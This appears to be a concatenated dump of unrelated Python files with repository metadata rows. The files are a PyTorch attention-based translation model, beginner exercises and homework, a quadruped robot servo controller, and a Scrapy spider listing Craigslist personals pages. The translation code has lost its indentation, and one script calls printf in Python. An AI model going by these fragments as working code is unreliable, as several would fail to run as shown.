self.val_df = self.text_df[self.text_df.split == 'val']
self.validation_size = len(self.val_df)
self.test_df = self.text_df[self.text_df.split == 'test']
self.test_size = len(self.test_df)
self._lookup_dict = {'train': (self.train_df, self.train_size),
'val': (self.val_df, self.validation_size),
'test': (self.test_df, self.test_size)}
self.set_split('train')
@classmethod
def load_dataset_and_make_vectorizer(cls, dataset_csv):
text_df = pd.read_csv(dataset_csv)
train_subset = text_df[text_df.split == 'train']
return cls(text_df, NMTVectorizer.from_dataframe(train_subset))
@classmethod
def load_dataset_and_load_vectorizer(cls, dataset_csv, vectorizer_filepath):
text_df = pd.read_csv(dataset_csv)
vectorizer = cls.load_vectorizer_only(vectorizer_filepath)
return cls(text_df, vectorizer)
@staticmethod
def load_vectorizer_only(vectorizer_filepath):
with open(vectorizer_filepath) as fp:
return NMTVectorizer.from_serializable(json.load(fp))
def save_vectorizer(self, vectorizer_filepath):
with open(vectorizer_filepath, "w") as fp:
json.dump(self._vectorizer.to_serializable(), fp)
def get_vectorizer(self):
return self._vectorizer
def set_split(self, split="train"):
self._target_split = split
self._target_df, self._target_size = self._lookup_dict[split]
def __len__(self):
return self._target_size
def __getitem__(self, index):
row = self._target_df.iloc[index]
vector_dict = self._vectorizer.vectorize(row.source_language, row.target_language)
return {"x_source": vector_dict["source_vector"],
"x_target": vector_dict["target_x_vector"],
"y_target": vector_dict["target_y_vector"],
"x_source_length": vector_dict["source_length"]}
def get_num_batches(self, batch_size):
return len(self) // batch_size
def generate_nmt_batches(dataset, batch_size, shuffle=False,
drop_last=True, device="cpu"):
"""A generator function which wraps the PyTorch DataLoader. The NMT Version """
""" 同时对长度进行排序 从大到小"""
dataloader = DataLoader(dataset=dataset, batch_size=batch_size,
shuffle=shuffle, drop_last=drop_last)
for data_dict in dataloader:
lengths = data_dict['x_source_length'].numpy()
sorted_length_indices = lengths.argsort()[::-1].tolist()
out_data_dict = {}
for name, tensor in data_dict.items():
out_data_dict[name] = data_dict[name][sorted_length_indices].to(device)
yield out_data_dict
class NMTEncoder(nn.Module):
def __init__(self, num_embeddings, embedding_size, rnn_hidden_size):
super(NMTEncoder, self).__init__()
self.source_embedding = nn.Embedding(
num_embeddings=num_embeddings,
embedding_dim=embedding_size,
padding_idx=0,
)
self.birnn = nn.GRU(
embedding_size, rnn_hidden_size, bidirectional=True, batch_first=True
)
def forward(self, x_source, x_lengths):
"""
:param x_source: (bs, 25)
:param x_lengths: (bs, )
:return:
"""
x_embeded = self.source_embedding(x_source) # (bs, 25, 64)
x_lengths = x_lengths.numpy() # (bs,)
x_packed = pack_padded_sequence(x_embeded, x_lengths, batch_first=True) # (sum(x_lengths), 64)
x_birnn_out, x_birnn_h = self.birnn(x_packed) # [(sum(x_lengths), 128*2), (2, bs, 128)]
x_birnn_h = x_birnn_h.permute(1, 0, 2) # (bs, 2, 128)
x_birnn_h = x_birnn_h.contiguous().view(x_birnn_h.size(0), -1) # (bs, 256)
x_unpacked, _ = pad_packed_sequence(x_birnn_out, batch_first=True) # (bs, ?,256)
# (bs, 10, 256)
# (bs, 256)
return x_unpacked, x_birnn_h
def verbose_attention(encoder_state_vectors, query_vector):
# (bs, max_len, 256)
# (bs, 256)
batch_size, num_vectors, vector_size = encoder_state_vectors.size()
vector_scores = torch.sum(encoder_state_vectors * query_vector.view(batch_size, 1, vector_size),
dim=2) # (bs, max_len)
vector_probabilities = F.softmax(vector_scores, dim=1) # (bs, max_len)
weighted_vectors = encoder_state_vectors * vector_probabilities.view(batch_size,
num_vectors, 1) # (bs, max_len, 256)
context_vectors = torch.sum(weighted_vectors, dim=1) # (bs, 256)
return context_vectors, vector_probabilities, vector_scores
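# An equivalent batched formulation of the same soft attention, written with
# torch.matmul instead of explicit broadcasting (added for illustration; the
# decoder below keeps using verbose_attention):
def terse_attention(encoder_state_vectors, query_vector):
    """Identical math to verbose_attention, minus the raw scores."""
    # (bs, max_len, d) x (bs, d, 1) -> (bs, max_len)
    vector_scores = torch.matmul(encoder_state_vectors, query_vector.unsqueeze(dim=2)).squeeze(dim=2)
    vector_probabilities = F.softmax(vector_scores, dim=-1)
    # (bs, d, max_len) x (bs, max_len, 1) -> (bs, d)
    context_vectors = torch.matmul(encoder_state_vectors.transpose(-2, -1),
                                   vector_probabilities.unsqueeze(dim=2)).squeeze(dim=2)
    return context_vectors, vector_probabilities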
class NMTDecoder(nn.Module):
def __init__(self, num_embeddings, embedding_size, rnn_hidden_size, bos_index):
super(NMTDecoder, self).__init__()
self._rnn_hidden_size = rnn_hidden_size
self.target_embedding = nn.Embedding(num_embeddings=num_embeddings,
embedding_dim=embedding_size,
padding_idx=0)
self.gru_cell = nn.GRUCell(embedding_size + rnn_hidden_size,
rnn_hidden_size)
self.hidden_map = nn.Linear(rnn_hidden_size, rnn_hidden_size)
self.classifier = nn.Linear(rnn_hidden_size * 2, num_embeddings)
self.bos_index = bos_index
self._sampling_temperature = 3
def _init_indices(self, batch_size):
return torch.ones(batch_size, dtype=torch.int64) * self.bos_index
def _init_context_vectors(self, batch_size):
return torch.zeros(batch_size, self._rnn_hidden_size)
def forward(self, encoder_state, initial_hidden_state, target_sequence, sample_probability=0.0):
"""
:param encoder_state: (bs, max_len, 256)
:param initial_hidden_state: (bs, 256)
:param target_sequence: (bs, 25) target
:param sample_probability:
:return:
"""
if target_sequence is None:
sample_probability = 1.
else:
target_sequence = target_sequence.permute(1, 0) # (25,bs)
h_t = self.hidden_map(initial_hidden_state) # (bs, 256)
batch_size = encoder_state.size(0) # bs
context_vectors = self._init_context_vectors(batch_size) # (bs, 256)
y_t_index = self._init_indices(batch_size) # (bs, ) [2] * bs
device = encoder_state.device
h_t = h_t.to(device)
y_t_index = y_t_index.to(device)
context_vectors = context_vectors.to(device)
output_vectors = []
self._cached_p_attn = []
self._cached_ht = []
self._cached_decoder_state = encoder_state.cpu().detach().numpy() # (bs ,10, 256)
        # assumes a target sequence was provided; pure inference (target_sequence
        # is None) would additionally need an explicit maximum output length
        output_sequence_size = target_sequence.size(0)  # 25
for i in range(output_sequence_size):
use_sample = np.random.random() < sample_probability
if not use_sample:
y_t_index = target_sequence[i]
y_input_vector = self.target_embedding(y_t_index) # (bs, 64)
rnn_input = torch.cat([y_input_vector, context_vectors], dim=1) # (bs, 64 + 256)
h_t = self.gru_cell(rnn_input, h_t) # (bs, 256)
self._cached_ht.append(h_t.cpu().data.numpy())
            # inputs: encoder_state (bs, max_len, 256), query h_t (bs, 256)
            # outputs: context_vectors (bs, 256), p_attn (bs, max_len)
context_vectors, p_attn, _ = verbose_attention(
encoder_state_vectors=encoder_state,
query_vector=h_t,
)
self._cached_p_attn.append(p_attn.cpu().detach().numpy())
prediction_vector = torch.cat((context_vectors, h_t), dim=1)
score_for_y_t_index = self.classifier(F.dropout(prediction_vector, 0.3)) # (bs, 4911)
if use_sample:
p_y_t_index = F.softmax(score_for_y_t_index * self._sampling_temperature, dim=1)
y_t_index = torch.multinomial(p_y_t_index, 1).squeeze()
output_vectors.append(score_for_y_t_index)
# (25, 5, 4911)
output_vectors = torch.stack(output_vectors).permute(1, 0, 2) # (bs, 25, 4911)
return output_vectors
class NMTModel(nn.Module):
def __init__(self, source_vocab_size, source_embedding_size,
target_vocab_size, target_embedding_size, encoding_size,
target_bos_index):
super(NMTModel, self).__init__()
self.encoder = NMTEncoder(num_embeddings=source_vocab_size,
embedding_size=source_embedding_size,
rnn_hidden_size=encoding_size)
decoding_size = encoding_size * 2
self.decoder = NMTDecoder(num_embeddings=target_vocab_size,
embedding_size=target_embedding_size,
rnn_hidden_size=decoding_size,
bos_index=target_bos_index)
def forward(self, x_source, x_source_lengths, target_sequence, sample_probability=0.5):
"""
:param x_source: (batch, vectorizer.max_source_length) (bs,25)
:param x_source_lengths: length of the sequence (bs,)
:param target_sequence: target text data tensor (bs, 25)
:return: prediction vectors at each output step
"""
# (bs, 10, 256)
# (bs, 256)
encoder_state, final_hidden_states = self.encoder(x_source, x_source_lengths)
decoded_states = self.decoder(encoder_state,
final_hidden_states,
target_sequence,
sample_probability=sample_probability,
)
return decoded_states
def normalize_sizes(y_pred, y_true):
if len(y_pred.size()) == 3:
y_pred = y_pred.contiguous().view(-1, y_pred.size(2))
if len(y_true.size()) == 2:
y_true = y_true.contiguous().view(-1)
return y_pred, y_true
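# e.g. y_pred (bs, seq, vocab) -> (bs*seq, vocab) and y_true (bs, seq) -> (bs*seq,),
# so that F.cross_entropy below can consume one prediction per token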
def compute_accuracy(y_pred, y_true, mask_index):
y_pred, y_true = normalize_sizes(y_pred, y_true)
_, y_pred_indices = y_pred.max(dim=1)
correct_indices = torch.eq(y_pred_indices, y_true).float()
valid_indices = torch.ne(y_true, mask_index).float()
n_correct = (correct_indices * valid_indices).sum().item()
n_valid = valid_indices.sum().item()
return n_correct / n_valid * 100
def sequence_loss(y_pred, y_true, mask_index):
y_pred, y_true = normalize_sizes(y_pred, y_true)
return F.cross_entropy(y_pred, y_true, ignore_index=mask_index)
if __name__ == '__main__':
args = Namespace(
dataset_csv="simplest_eng_fra.csv",
vectorizer_file="vectorizer.json",
learning_rate=5e-4,
batch_size=5,
source_embedding_size=64,
target_embedding_size=64,
encoding_size=128,
device='cpu',
)
dataset = NMTDataset.load_dataset_and_make_vectorizer(args.dataset_csv)
dataset.save_vectorizer(args.vectorizer_file)
vectorizer = dataset.get_vectorizer()
mask_index = vectorizer.target_vocab.mask_index
dataset.set_split('train')
batch_generator = generate_nmt_batches(dataset,
batch_size=args.batch_size,
device=args.device)
model = NMTModel(
source_vocab_size=len(vectorizer.source_vocab),
source_embedding_size=args.source_embedding_size,
target_vocab_size=len(vectorizer.target_vocab),
target_embedding_size=args.target_embedding_size,
encoding_size=args.encoding_size,
target_bos_index=vectorizer.target_vocab.begin_seq_index
)
optimizer = optim.Adam(model.parameters(), lr=args.learning_rate)
for batch_idx, batch_dict in enumerate(batch_generator):
optimizer.zero_grad()
y_pred = model(batch_dict['x_source'],
batch_dict['x_source_length'],
batch_dict['x_target'],
sample_probability=0.5,
)
loss = sequence_loss(y_pred, batch_dict['y_target'], mask_index)
loss.backward()
optimizer.step()
print(loss.item())
| [
"[email protected]"
] | |
c4479c6eb8c2b3de6a56bf651e278fa061e0a46d | 9be1ab6f7cc9e1e8474b7c76ef89284b54782c46 | /chapter_remaining/3_importing.py | 74ab8e113a71fbe0f3835725cf596ca9ef7ba6e6 | [] | no_license | Nateque123/python_tutorials | 8d9842d46570e6cecd7aa5419b9f77bc4468d391 | 83743acf4862155c5837c154d0422f74d0629043 | refs/heads/master | 2022-11-20T11:39:02.565456 | 2020-07-24T11:08:34 | 2020-07-24T11:08:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | # simple importing practice # check file2 also
import file2
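# file2 is a sibling module (not shown in this snapshot); judging from the
# calls below, it is assumed to contain something like:
#   a = 1
#   def func(name):
#       return 'hello ' + name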
print(file2.func('nateq'))
from file2 import a
print(a) | [
"[email protected]"
] | |
70deb99eb2fe58fe8366b806aeff04fe4948a09f | 86019cfe5500aa3bd93c6cf393d6de197ff824ef | /Sai_Vinay.py | d7ac0dd4e0e205ff28f7ab792672dd6e19c8c491 | [] | no_license | rohithavarada/Member-Submissions | 8039de18ca8e1ae5fb3800935c6c6beca504154f | 9784d76654eb6192c36dd89035c4d9a629e1d27b | refs/heads/master | 2020-03-27T16:10:25.438340 | 2018-08-30T14:54:53 | 2018-08-30T14:54:53 | 146,763,830 | 0 | 0 | null | 2018-08-30T14:42:16 | 2018-08-30T14:42:16 | null | UTF-8 | Python | false | false | 89 | py | # This is for testing
printf("Hello World");
import string
print(string.ascii_lowercase)
| [
"[email protected]"
] | |
8f0ea1ddcb842afbdfefab10bdc1a50be19625f3 | a140b45f9f16b74353d15ed573ea765b3fef046d | /algorithms/leet.0693.src.1.py | 04b92c007caace7e60b187ff08050dfd9eefba49 | [] | no_license | fish-ball/leetcode | 258d4b37f05560d914bcd29f7c54820deeadb33f | 3dfd8f73c65d43cc2766c20700a619141acb927b | refs/heads/master | 2023-05-28T18:32:43.638675 | 2023-05-20T04:25:23 | 2023-05-20T04:25:23 | 31,968,994 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 207 | py | class Solution:
def hasAlternatingBits(self, n: int) -> bool:
if n <= 2:
return True
if n & 3 in (3, 0):
return False
return self.hasAlternatingBits(n>>1)
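
# Hypothetical quick check (not part of the original submission):
#   Solution().hasAlternatingBits(5)  # True  (binary 101)
#   Solution().hasAlternatingBits(7)  # False (binary 111)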
| [
"[email protected]"
] | |
7c2820d6f5a8d4bf54d25dcbf7735c173f8122c3 | e303bf4fb1d1c6ba482788a142ce3f3f5ced9702 | /python_5_lesson_hw.py | 4aeb536f640a8ff6c3b54d8dc601096e06b21f0f | [] | no_license | isthatjoke/projects | 0d109c7f25aefb1c8e0c9d513807510ea51f5b8c | fa51cec43d6fd7b39ae9dbf4e40eca1033770782 | refs/heads/master | 2021-01-05T23:15:27.650953 | 2020-12-01T16:12:00 | 2020-12-01T16:12:00 | 241,164,290 | 1 | 0 | null | 2020-12-01T16:12:01 | 2020-02-17T17:12:37 | Python | UTF-8 | Python | false | false | 6,927 | py | # 1. Создать программно файл в текстовом формате, записать в него построчно данные,
# вводимые пользователем. Об окончании ввода данных свидетельствует пустая строка.
while True:
user_input = input("enter your text ")
if user_input == "":
break
my_file = open("new_file.txt", "a", encoding="utf-8")
my_file.writelines(user_input + "\n")
my_file.close()
# 2. Create a text file (not programmatically), save several lines in it, then
# count the number of lines and the number of words in each line.
i = 1
with open("new_file.txt", encoding="utf-8") as my_file:
content = my_file.readlines()
print("количество строк в файле ", len(content))
for el in content:
my_el = el.split(" ")
my_str = len(my_el)
        print(f'number of words in line {i} - {my_str}')
i += 1
# 3. Create a text file (not programmatically) listing employee surnames and
# their salaries, one per line. Determine which employees earn less than
# 20,000, print their surnames, and compute the average employee income.
with open("new_file.txt", "r", encoding="utf-8") as my_file:
my_f = list(my_file)
employee_list = []
salaries = []
for line in my_f:
    s = line.rstrip().split(" ")
    salaries.append(float(s[1]))
    if float(s[1]) < 20000:
        employee_list.append(s[0])
print(employee_list)
print("average income:", sum(salaries) / len(salaries))
# 4. Create (not programmatically) a text file with the following contents:
# One — 1
# Two — 2
# Three — 3
# Four — 4
# Write a program that opens the file for reading and reads it line by line.
# The English numerals must be replaced with Russian ones.
# The new block of lines must be written to a new text file.
lib = {'One': 'Один',
'Two': 'Два',
'Three': 'Три',
'Four': 'Четыре',
}
with open("new.txt", encoding="utf-8") as file:
my_f = list(file)
my_file = []
for line in my_f:
tmp1 = lib.get(line[:(line.find(" "))])
with open("last.txt", "a", encoding="utf-8") as new_file:
new_file.write(line.replace(line[:(line.find(" "))], tmp1))
# 5. Programmatically create a text file and write a set of space-separated
# numbers into it. The program should compute the sum of the numbers in the
# file and print it to the screen.
user_input = input("введите цифры через пробел ")
if user_input.isalpha() or user_input.isspace():
print("Неверный ввод")
else:
with open("file.txt", "w") as file:
file.write(user_input)
with open("file.txt") as file:
temp = (file.read()).split(" ")
total_sum = 0
for el in temp:
total_sum = total_sum + int(el)
print(total_sum)
# 6. Create (not programmatically) a text file where each line describes a school
# subject and the number of lecture, seminar and lab classes it has. Not every
# subject needs to have all class types. Build a dictionary mapping each subject
# name to its total number of classes and print it.
# Example file lines:
# Computer Science: 100(lec) 50(sem) 20(lab).
# Physics: 30(lec) — 10(lab)
# PE: — 30(sem) —
#
# Example dictionary:
# {"Computer Science": 170, "Physics": 40, "PE": 30}
import re
my_list = []
my_dict = {}
with open("file.txt", encoding="utf-8") as file:
for line in file:
my_list.append(line.rstrip())
for line in my_list:
fnd = line.find(":")
dlt = line[:fnd]
    dig = map(int, re.findall(r'\d+', line))
my_dict.update({dlt: sum(dig)})
print(my_dict)
# 7. Create (not programmatically) a text file in which every line holds data
# about a company: name, form of ownership, revenue, costs.
# Example line: firm_1 LLC 10000 5000.
# Read the file line by line and compute each company's profit as well as the
# average profit. Companies that made a loss are excluded from the average.
# Then build a list holding a dictionary of companies and their profits plus a
# dictionary with the average profit. Loss-making companies are still added to
# the first dictionary (with the value of their loss).
# Example list: [{"firm_1": 5000, "firm_2": 3000, "firm_3": 1000}, {"average_profit": 2000}].
# Save the resulting list as a json object to a file.
# Example json object:
# [{"firm_1": 5000, "firm_2": 3000, "firm_3": 1000}, {"average_profit": 2000}]
#
# Hint: use context managers.
# Подсказка: использовать менеджеры контекста.
import json
firms = {}
ave = []
ave_profit = {}
full_list = [firms, ave_profit]
with open("my_file.txt", encoding="utf-8") as file:
for line in file:
tmp = line[:(line.find(" "))]
a = (line.rstrip()).split(" ")
        profit = int(a[2]) - int(a[3])
        firms.update({tmp: profit})  # loss-making firms are recorded too, as a negative value
        if profit > 0:
            ave.append(profit)  # losses are excluded from the average
    ave_profit.update({"average_profit": sum(ave) / len(ave)})
with open("my_file.json", "w", encoding="utf-8") as j_file:
json.dump(full_list, j_file)
| [
"[email protected]"
] | |
ad8780f4445385ddc1e4194084b8981b92085a96 | fc557b9e46ee32e08860c58b29139ea377d62a16 | /robot_controller.py | a3529bb9dbc39c2451c4cb6e3ec4d18305d7407e | [] | no_license | CharmFlex-98/Quadruped_robot | 91e3fdb837b44377640c99d4883759530d9437cd | ebe56e83a8a07b4a74f84e4f95e3fe852be9114e | refs/heads/main | 2023-07-08T23:15:22.685269 | 2021-08-20T02:48:22 | 2021-08-20T02:48:22 | 398,134,223 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,643 | py | from __future__ import division
import time
import Adafruit_PCA9685
import pygame
import numpy as np
from inverse_kinematics import *
from math import *
class robot:
def __init__(self, width=640, height=480):
self.pwm = Adafruit_PCA9685.PCA9685()
self.pwm.set_pwm_freq(60)
self.direction={15:-1, 14:1, 13:-1, 12:1, 11:1, 10:-1, 9:1, 8:-1}
self.origin=[84, 49, 74, 63, 99, 117, 114, 124] # from 8 to 15, real servo degree!
self.stand_up=[58, 104, 50, 112, 123, 67, 136, 74]
self.thigh_calibration=[49, 63, 117, 124] # 9, 11, 13, 15
self.servo_arm_calibration=[43, 33, 140, 155] # 8, 10, 12, 14
self.calibration={8:43, 9:49, 10:33, 11:63, 12:140, 13:117, 14:155, 15:124} # from 8 to 15
self.servos={}
self.initial=[]
self.delta=[]
self.reset()
self.rad=0
self.y_offset=0
self.x_offset=0
self.vertical=0
self.vertical_direction=1
self.counter=0
self.status='sleep' #'normal', 'sleep', 'sit', 'forward', 'backward, reset'
def degree2pwm(self, degree):
pwm=round((degree/180)*(600-150)+150)
return pwm
def pwm2degree(self, pwm):
degree=round((pwm-150)/(600-150)*180)
return degree
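    # The servo PWM range is 150-600 ticks over 0-180 degrees, so for example
    # degree2pwm(0) -> 150, degree2pwm(90) -> 375, degree2pwm(180) -> 600.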
def rotate_to(self, servo_index, target_degree, time_step, pov=False):
if pov:
target_degree=self.pov2servo_view(servo_index, target_degree)
for index, i in enumerate(servo_index):
self.initial.append(self.servos[i])
target_pwm=self.degree2pwm(target_degree[index])
self.delta.append((target_pwm-self.servos[i]))
for step in range(time_step):
for index, p in enumerate(servo_index):
self.servos[p]=self.initial[index]+self.delta[index]*((step+1)/time_step)
self.servos[p]=self.post_process_pwm(self.servos[p])
self.pwm.set_pwm(p, 0, round(self.servos[p]))
self.initial=[]
self.delta=[]
#print('rotate all done')
#self.check_pwm()
def rotate(self, servo_index, velocity):
for index, i in enumerate(servo_index):
self.servos[i]=self.servos[i]+velocity[index]*self.direction[i]
self.servos[i]=self.post_process_pwm(self.servos[i])
self.pwm.set_pwm(i, 0, round(self.servos[i]))
print('servo {} pwm is {}'.format(i, self.servos[i]))
def reset(self):
for index, i in enumerate(range(8, 16)):
self.servos[i]=self.degree2pwm(self.origin[index])
self.pwm.set_pwm(i, 0, self.degree2pwm(self.origin[index]))
time.sleep(0.01)
def check_pwm(self):
for i in self.servos:
print('servo {} in degree:{} pwm:{}'.format(i, self.pwm2degree(self.servos[i]), self.servos[i]))
time.sleep(1)
def post_process_pwm(self, pwm, min_pwm=150, max_pwm=600):
value=max(min(pwm, max_pwm), min_pwm)
return value
def pov2servo_view(self, servo_index, servo_pov_degree):
real_degree=servo_pov_degree
for index, i in enumerate(servo_index):
if self.direction[i]==-1:
real_degree[index]=180-servo_pov_degree[index]
print(real_degree)
return real_degree
def walk(self, radius1, radius2, velocity):
r1=radius1
r2=radius2
x1=r1*cos(self.rad)+self.x_offset
y1=r2*sin(self.rad)+self.y_offset
x2=r1*cos(self.rad+pi)+self.x_offset
y2=r2*sin(self.rad+pi)+self.y_offset
self.gait([15, 14, 9, 8], x1, y1, 1)
self.gait([13, 12, 11, 10], x2, y2, 1)
self.rad-=velocity
def walk_turn(self, radius1, radius2, velocity, turn_rate=2, direction='left'):
r1=radius1
r2=radius2
print(self.rad)
x1=r1*cos(self.rad)+self.x_offset
y1=r2*sin(self.rad)+self.y_offset
x2=r1*cos(self.rad+pi)+self.x_offset
y2=r2*sin(self.rad+pi)+self.y_offset
if direction=='right':
self.gait([15, 14], x1, y1, 1)
self.gait([9, 8], x1/turn_rate, y1, 1)
self.gait([13, 12], x2, y2, 1)
self.gait([11, 10], x2/turn_rate, y2, 1)
elif direction=='left':
self.gait([15, 14], x1/turn_rate, y1, 1)
self.gait([9, 8], x1, y1, 1)
self.gait([13, 12], x2/turn_rate, y2, 1)
            self.gait([11, 10], x2, y2, 1)  # full stride on this side, mirroring the 'right' branch
else:
print('insert direction please!')
return
self.rad-=velocity
def up_down(self, velocity):
self.y_offset-=velocity
self.gait(range(8, 16), self.x_offset, self.y_offset, 1)
def front_back(self, velocity):
self.x_offset-=velocity
self.gait(range(8, 16), self.x_offset, self.y_offset, 1)
def turning_body(self, radius, velocity, radius_multiplier=2.5, x_multiplier=4, y_multiplier=4):
dif = radius * radius_multiplier * sin(self.rad)
x_offset = radius * x_multiplier * cos(self.rad / 2) + self.x_offset-radius*x_multiplier
y_offset = radius * y_multiplier * sin(self.rad/2) + self.y_offset
rad = math.asin(dif / 100)
x1 = (160 - dif - self.y_offset) * sin(rad) + x_offset + radius * cos(rad + pi / 2)
y1 = (160 - dif - self.y_offset) * (1 - sin(rad + pi / 2)) + y_offset + dif
x2 = (160 + dif - self.y_offset) * sin(rad) + x_offset + radius * cos(rad + pi / 2)
y2 = (160 + dif - self.y_offset) * (1 - sin(rad + pi / 2)) + y_offset - dif
self.gait([15, 14, 11, 10], x1, y1, 1)
self.gait([13, 12, 9, 8], x2, y2, 1)
self.rad += velocity
def jump(self, radius, velocity):
x=self.x_offset
self.vertical=self.vertical+velocity*self.vertical_direction
if self.vertical<=0:
self.counter+=1
self.vertical_direction*=-1
self.vertical=0
if self.vertical>=radius:
self.vertical_direction*=-1
self.vertical=radius
print(self.vertical)
y1=self.vertical*(self.counter%2)+self.y_offset
y2=self.vertical*((self.counter+1)%2)+self.y_offset
self.gait([15, 14, 9, 8], x, y1, 1)
self.gait([13, 12, 11, 10], x, y2, 1)
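    # jump() sweeps self.vertical up and down between 0 and radius like a
    # triangle wave; the parity of self.counter alternates which leg group
    # receives the vertical offset.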
def body_slant(self, velocity):
self.rad+=velocity
dif=200*sin(self.rad)
dif=dif/2
front_legs_x=(160-dif-self.y_offset)*cos((pi/2)-self.rad)+self.x_offset
front_legs_y=(160-dif-self.y_offset)*(1-sin((pi/2)+self.rad))+self.y_offset+dif
hind_legs_x=(160+dif-self.y_offset)*cos((pi/2)-self.rad)+self.x_offset
hind_legs_y=(160+dif-self.y_offset)*(1-sin((pi/2)+self.rad))+self.y_offset-dif
self.gait([15, 14, 11, 10], front_legs_x, front_legs_y, 1)
self.gait([13, 12, 9, 8], hind_legs_x, hind_legs_y, 1)
def stand_reset(self, time_step, x=-22, y=-16):
self.y_offset=y #-13
self.x_offset=x #-6
self.rad=0
self.gait(range(8, 16), self.x_offset, self.y_offset, time_step)
def gait(self, servos, dx, dy, time_step):
servo_index=[]
servo_angle=[]
thigh_angle, arm_angle=ik_solver(dx, dy)
for x in servos:
servo_index.append(x)
if x in [9, 11, 13, 15]:
servo_angle.append(thigh_angle*self.direction[x]+self.calibration[x])
else:
servo_angle.append(arm_angle*self.direction[x]+self.calibration[x])
self.rotate_to(servo_index, servo_angle, time_step, pov=False)
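# Hypothetical usage sketch (instance name and numbers are illustrative only):
# my_robot.stand_reset(50)
# while True:
#     my_robot.walk(radius1=20, radius2=10, velocity=0.2)
#     time.sleep(0.02)  # roughly 50 Hz update loop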
#my_robot.rotate_to([15, 13, 11, 9], [110, 110, 110, 110], 50)
#my_robot.check_pwm() | [
"[email protected]"
] | |
22256ba682801c86d92e53c516104a2ac18db1fd | b27b26462524984951bfbab9250abd145ecfd4c8 | /Demoing/stage_two/bloomingtonnormal/craigslist_sample/craigslist_sample/spiders/craigslist_spider.py | 9ccd525099e5b2802a2344337a1293d1d28242f0 | [] | no_license | afcarl/fastTraffickingGrab | cb813d066f1f69f359598e0b55e632dafd273c89 | 9ff274cb7c9b6c7b60d1436c209b2bfc5907267d | refs/heads/master | 2020-03-26T06:21:21.404931 | 2014-08-16T12:38:29 | 2014-08-16T12:38:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,042 | py |
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import HtmlXPathSelector
from craigslist_sample.items import CraigslistSampleItem
class CraigslistSpider(CrawlSpider):
name = "craigslist"
allowed_domains = ["craigslist.org"]
start_urls = [
"http://bn.craigslist.org",
"http://bn.craigslist.org/cas/",
"http://bn.craigslist.org/cas/index100.html",
"http://bn.craigslist.org/cas/index200.html",
"http://bn.craigslist.org/cas/index300.html",
"http://bn.craigslist.org/cas/index400.html",
"http://bn.craigslist.org/cas/index500.html",
"http://bn.craigslist.org/cas/index600.html",
"http://bn.craigslist.org/cas/index700.html",
"http://bn.craigslist.org/cas/index800.html",
"http://bn.craigslist.org/cas/index900.html",
"http://bn.craigslist.org/cas/index1000.html",
"http://bn.craigslist.org/cas/index1100.html",
"http://bn.craigslist.org/cas/index1200.html",
"http://bn.craigslist.org/cas/index1300.html",
"http://bn.craigslist.org/cas/index1400.html",
"http://bn.craigslist.org/cas/index1500.html",
"http://bn.craigslist.org/cas/index1600.html",
"http://bn.craigslist.org/cas/index1700.html",
"http://bn.craigslist.org/cas/index1800.html",
"http://bn.craigslist.org/cas/index1900.html",
"http://bn.craigslist.org/cas/index2000.html",
"http://bn.craigslist.org/cas/index2100.html",
"http://bn.craigslist.org/cas/index2200.html",
"http://bn.craigslist.org/cas/index2300.html",
"http://bn.craigslist.org/cas/index2400.html",
"http://bn.craigslist.org/cas/index2500.html",
"http://bn.craigslist.org/cas/index2600.html",
"http://bn.craigslist.org/cas/index2700.html",
"http://bn.craigslist.org/cas/index2800.html",
"http://bn.craigslist.org/cas/index2900.html",
"http://bn.craigslist.org/cas/index3000.html",
"http://bn.craigslist.org/cas/index3100.html",
"http://bn.craigslist.org/cas/index3200.html",
"http://bn.craigslist.org/cas/index3300.html",
"http://bn.craigslist.org/cas/index3400.html",
"http://bn.craigslist.org/cas/index3500.html",
"http://bn.craigslist.org/cas/index3600.html",
"http://bn.craigslist.org/cas/index3700.html",
"http://bn.craigslist.org/cas/index3800.html",
"http://bn.craigslist.org/cas/index3900.html",
"http://bn.craigslist.org/cas/index4000.html",
"http://bn.craigslist.org/cas/index4100.html",
"http://bn.craigslist.org/cas/index4200.html",
"http://bn.craigslist.org/cas/index4300.html",
"http://bn.craigslist.org/cas/index4400.html",
"http://bn.craigslist.org/cas/index4500.html",
"http://bn.craigslist.org/cas/index4600.html",
"http://bn.craigslist.org/cas/index4700.html",
"http://bn.craigslist.org/cas/index4800.html",
"http://bn.craigslist.org/cas/index4900.html",
"http://bn.craigslist.org/cas/index5000.html",
"http://bn.craigslist.org/cas/index5100.html",
"http://bn.craigslist.org/cas/index5200.html",
"http://bn.craigslist.org/cas/index5300.html",
"http://bn.craigslist.org/cas/index5400.html",
"http://bn.craigslist.org/cas/index5500.html",
"http://bn.craigslist.org/cas/index5600.html",
"http://bn.craigslist.org/cas/index5700.html",
"http://bn.craigslist.org/cas/index5800.html",
"http://bn.craigslist.org/cas/index5900.html",
"http://bn.craigslist.org/cas/index6000.html",
"http://bn.craigslist.org/cas/index6100.html",
"http://bn.craigslist.org/cas/index6200.html",
"http://bn.craigslist.org/cas/index6300.html",
"http://bn.craigslist.org/cas/index6400.html",
"http://bn.craigslist.org/cas/index6500.html",
"http://bn.craigslist.org/cas/index6600.html",
"http://bn.craigslist.org/cas/index6700.html",
"http://bn.craigslist.org/cas/index6800.html",
"http://bn.craigslist.org/cas/index6900.html",
"http://bn.craigslist.org/cas/index7000.html",
"http://bn.craigslist.org/cas/index7100.html",
"http://bn.craigslist.org/cas/index7200.html",
"http://bn.craigslist.org/cas/index7300.html",
"http://bn.craigslist.org/cas/index7400.html",
"http://bn.craigslist.org/cas/index7500.html",
"http://bn.craigslist.org/cas/index7600.html",
"http://bn.craigslist.org/cas/index7700.html",
"http://bn.craigslist.org/cas/index7800.html",
"http://bn.craigslist.org/cas/index7900.html",
"http://bn.craigslist.org/cas/index8000.html",
"http://bn.craigslist.org/cas/index8100.html",
"http://bn.craigslist.org/cas/index8200.html",
"http://bn.craigslist.org/cas/index8300.html",
"http://bn.craigslist.org/cas/index8400.html",
"http://bn.craigslist.org/cas/index8500.html",
"http://bn.craigslist.org/cas/index8600.html",
"http://bn.craigslist.org/cas/index8700.html",
"http://bn.craigslist.org/cas/index8800.html",
"http://bn.craigslist.org/cas/index8900.html",
"http://bn.craigslist.org/cas/index9000.html",
"http://bn.craigslist.org/cas/index9100.html",
"http://bn.craigslist.org/cas/index9200.html",
